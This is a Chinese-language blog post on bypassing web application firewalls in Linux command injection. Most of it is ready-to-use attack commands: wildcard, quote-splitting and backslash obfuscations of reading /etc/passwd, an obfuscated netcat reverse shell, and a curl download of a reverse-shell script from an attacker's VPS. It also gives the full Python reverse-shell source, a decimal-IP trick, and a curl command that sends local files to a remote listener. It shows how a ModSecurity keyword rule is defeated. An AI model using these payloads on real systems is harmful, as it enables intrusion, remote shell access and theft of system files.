FLy_鹏程万里

专注于IT技术,只做IT技术的分享与研究,欢迎广大IT技术人员参与分享与讨论!...

Linux环境下命令注入————WAF绕过技巧

命令注入之Web应用防火墙绕过技巧

本文中讲述的绕过防火墙技巧,只适用于linux系统命令注入环境中,大家就不要纠结于这些绕过技巧不适用于mysql、window什么的。


使用通配符绕过防火墙规则

例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd

/???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd

有时候我们想用netcat在目标机器上反弹一个端口,那么可以如下操作:

/???/n? -e /???/b??h 127.0.0.1 6666
# /bin/nc -e /bin/bash 127.0.0.1 6666
# -e 后面跟上你要执行的程序,在连接成功后会自动运行该程序

当然,你还可以使用*星号、[0-9]字符集等匹配符来获取相关信息,有关标准通配符的更多信息可以在终端中键入 命令man 7 glob,按照手册进行学习。

使用字符串拼接绕过防火墙规则

连接字符串的操作符主要有以下几种

在python、Java中使用 + 号;在PHP、perl中使用 . 号;在lua语言中则使用 .. 符号来连接字符串。而这些编程语言中的一些字符串连接符,有时候在bash中也可以达到字符连接的效果,这就导致我们可以绕过一些Web应用防火墙规则(例如基于关键词匹配的防火墙规则)。

root@kali:~# echo Mochazz
Mochazz
root@kali:~# echo Mo'''chazz'
Mochazz
root@kali:~# echo 'Mo''chazz'
Mochazz
root@kali:~# echo 'M'och'az'z
Mochazz

看一条pm匹配规则(防火墙规则)

# Detect suspicious client by looking at the user agent identification 
SecRule REQUEST_HEADERS:User-Agent "@pm passwd shadow" "id:166"

这条规则将忽略大小写进行匹配,如果匹配中passwd或shadow词组,即进行阻断,但是如果我们使用字符串拼接,则可以绕过改规则

root@kali:~# /'b'i''n/'c''a't /e't'c/p''as''sw'd'

使用以下命令在受害机上下载用于反弹shell的脚本

curl -v "http://VPS的IP/shell.py" -o /tmp/shell.py

shell.py 代码如下

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<my ip address>",2375))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

提前在你的VPS上用nc侦听一个端口

nc -lvp [port]

更进一步,我们可以将点分十进制的IP转换成长整数IP,例如

curl -v "http://127.0.0.1/shell.py" -o /tmp/shell.py
curl -v "http://2130706433/shell.py" -o /tmp/shell.py

使用 \ 符号来绕过WAF

root@kali:~# c\a\t /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

使用 \ 符号加回车来绕过WAF

root@kali:~# c\
> at /e't'c/p''a's'swd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

使用curl -d参数读取本地文件

curl -d @/<file> <remote server>
例如
curl -d @/etc/passwd 127.0.0.1:8888
# 在本地侦听8888端口即可接受到数据

关于文中更详细的内容,大家可以参考下面两篇文章。
PS:刚好这两天在看这两篇文章,freebuf小编在昨天翻译了其中一篇,大家也可以看WAF绕过技巧浅谈

Web Application Firewall (WAF) Evasion Techniques

Web Application Firewall (WAF) Evasion Techniques #2

阅读更多

扫码向博主提问

去开通我的Chat快问

fly_hps

非学,无以致疑;非问,无以广识
  • 擅长领域:
  • 网络编程
  • 渗透测试
  • 代码审计
  • 密码学
  • 漏洞分析
上一篇HackTools———10、使用Python编写TCP客户端、服务器端
下一篇VMware虚拟机三种网络模式详解
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭